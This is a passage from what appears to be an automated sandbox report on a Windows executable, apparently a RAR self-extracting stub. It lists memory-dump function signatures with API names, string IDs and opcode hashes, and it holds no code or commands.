                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: abort$CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 2889003569-2084237596
                                  • Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                  • Instruction ID: aac80458c8c84349c3146b4f0f1327ad45e5e5019ed1a5431f4d9ac6384059c6
                                  • Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                  • Instruction Fuzzy Hash: 8291A173A087818BE711DF65E8802ADF7A0FB44BA8F54412AEE4D97B55DF38E1A1C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 2395640692-629598281
                                  • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                  • Instruction ID: aff664137ca5b6c6adedee79e158089ca0ff5e4ed5d3c638b50f13a6d02a112b
                                  • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                  • Instruction Fuzzy Hash: 58516D32E1960287EB54EF15F444A2DE795FB44FA4F908134DE0A87748EF78F8528BA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$Show$Rect
                                  • String ID: RarHtmlClassName
                                  • API String ID: 2396740005-1658105358
                                  • Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                  • Instruction ID: a0114ca74aa5d499dff9686e73172cdfa4d56e23dc368f2bb8bb525ec5d981a0
                                  • Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                  • Instruction Fuzzy Hash: 1351722261878287EA24AF25F58437EE361FB85FA0F844135DE4E86755CF3CF1458B50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                  • API String ID: 0-56093855
                                  • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                  • Instruction ID: accd7fa9f8580444cb1f87f028e45558380d6f55fcb72ccded3b13dfe8292ea7
                                  • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                  • Instruction Fuzzy Hash: CF21F721A0CA8683EA10AF19B84826CE3A1EB45FA8FD44036D99DC7364DF7CF55483A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                  • Instruction ID: a6a113b4049fda8d3e175096c0b9cc49405efa92addd63a06bd5b825d51fa2e0
                                  • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                  • Instruction Fuzzy Hash: 24F081A1A1864682EB44AF54F49467DE360EF88FA0F840039ED0F82765CF6CE584C760
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3215553584-0
                                  • Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                  • Instruction ID: e7447a1ed149c7d2467ed2eeed0b73cece9378e0afab1e7711693bfad0864e8f
                                  • Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                  • Instruction Fuzzy Hash: 9E81AFA2A186138BF711AF65E4806BDEAA0BB44FA8F845135DD0E93791CF3CB645C760
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 2398171386-0
                                  • Opcode ID: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                  • Instruction ID: 271f0a260e51715e61c35b6d08104cecafee360e803a794203b44fd3ccd82fe3
                                  • Opcode Fuzzy Hash: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                  • Instruction Fuzzy Hash: 6F51C762B18B414AFB50AF65F8402BDE3B1EB44BBCF814335DE1D86794DF38A2458391
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3659116390-0
                                  • Opcode ID: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                  • Instruction ID: 6e5f5901b84580e778e3dc040d416cbe5d415eed54be9ed51b2ca469b09c6f09
                                  • Opcode Fuzzy Hash: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                  • Instruction Fuzzy Hash: 1851D472A14A518AF710DF25E4847ADFBB0BB48BA8F445135DE4E87B98DF38E241C760
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID:
                                  • API String ID: 190572456-0
                                  • Opcode ID: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                  • Instruction ID: 87538afb684abdab70b2f0f8ba72c6bf31815098219f808c60839781f26e13b6
                                  • Opcode Fuzzy Hash: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                  • Instruction Fuzzy Hash: 3741BFA2B1961287FA15AF12B804679E391BB58FF0F994535DE1DCB784DF3CF04886A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                  • Instruction ID: ee524db426f40c55a2f41336d686b48d816e900e285695e7803c229d148e905b
                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                  • Instruction Fuzzy Hash: 451190F6E19A0307FA943924F4923BDC8416F54FB0E884630EE6D827E68F6C744182F1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __except_validate_context_recordabort
                                  • String ID: csm$csm
                                  • API String ID: 746414643-3733052814
                                  • Opcode ID: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                  • Instruction ID: aa53282b77733ab491752b4a671fa538338b6883b56046a9fcbfede65998357d
                                  • Opcode Fuzzy Hash: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                  • Instruction Fuzzy Hash: DB7182726086C18BDB61AF25E48077DFAA0EB05FA4F548136DA4D87B85CB3CE5A1C790
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID: $*
                                  • API String ID: 3215553584-3982473090
                                  • Opcode ID: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                  • Instruction ID: 9d5b26cea44529c1b62da35851956e5a4923badb0c1fbc8ae42cda73f2df2f2d
                                  • Opcode Fuzzy Hash: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                  • Instruction Fuzzy Hash: CB51487290D6818BE7656E35A09437CFBA0EB05F28F941135C64D813D6CF2CF6A5CEA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                  • String ID: csm
                                  • API String ID: 2466640111-1018135373
                                  • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                  • Instruction ID: 17bd5decc861aa721f47f07e079e4f95020086f01dc519396ec39e8ac6f7ded0
                                  • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                  • Instruction Fuzzy Hash: E5514D36A1874187D620EF55F44026EF7A4FB88BA0F900534DB8D87B56CF38E4A1CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                  • String ID: U
                                  • API String ID: 2456169464-4171548499
                                  • Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                  • Instruction ID: 0c2142bff4e5223e2822779643f80b69a0148e86e4205ae9be0d4050d5dda428
                                  • Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                  • Instruction Fuzzy Hash: 7D418162619A4586EB10AF55F8443BEE7A1FB88BA4F805031EE4D87788DF7CE541CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ObjectRelease
                                  • String ID:
                                  • API String ID: 1429681911-3916222277
                                  • Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                  • Instruction ID: 73819c735f1fdaa945e132d5a28d82343b6c31678f997ccc7cc1a3fc9542e443
                                  • Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                  • Instruction Fuzzy Hash: 90315A3661875187DA04EF22B80862EF7A1FB88FE1F904139ED5A83B55CF3CE1498B40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CapsDeviceRelease
                                  • String ID:
                                  • API String ID: 127614599-3916222277
                                  • Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                  • Instruction ID: 49beffaf12414c586b28a4d4e7139b0f9b353d0f50ca444408b51dcf911a4d9d
                                  • Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                  • Instruction Fuzzy Hash: 3FE08C21B08645C3EB486BB6F58D12EA261AB8CFE0F954039DE1E83784DE3DD4854300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 2025052027-0
                                  • Opcode ID: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                  • Instruction ID: e6e7cc57aa43592427f85a2d149107cb85c407e9dff671fb6bec461634defcee
                                  • Opcode Fuzzy Hash: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                  • Instruction Fuzzy Hash: D3B1C222E2864682EA10AF19F04856DF361FB45FA4F964631DA1D87790DF7CF790C3A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
                                  • Instruction ID: 0cd0cd0ecbe649f2cbdc33226ff158a92a9f73333f621088ab6302708fb7427e
                                  • Opcode Fuzzy Hash: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
                                  • Instruction Fuzzy Hash: 0A51B962B1474696FB00BF64E4442ECE361EB44FA8F814235DA1C97796EF2CF644C3A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                  • String ID:
                                  • API String ID: 1077098981-0
                                  • Opcode ID: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
                                  • Instruction ID: 13e38152de996c9f72fd4f019da8f85795347a3e096433012582e82089427fa1
                                  • Opcode Fuzzy Hash: 02d44a4f672a4ff076bd7af01b23eac749c9e801f4074d58631ddee5945a2c64
                                  • Instruction Fuzzy Hash: 74515E32A28B4287EB10AF21F44476EE3A5FB84B94F900035EA4D97B58DF3CE554CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 4141327611-0
                                  • Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
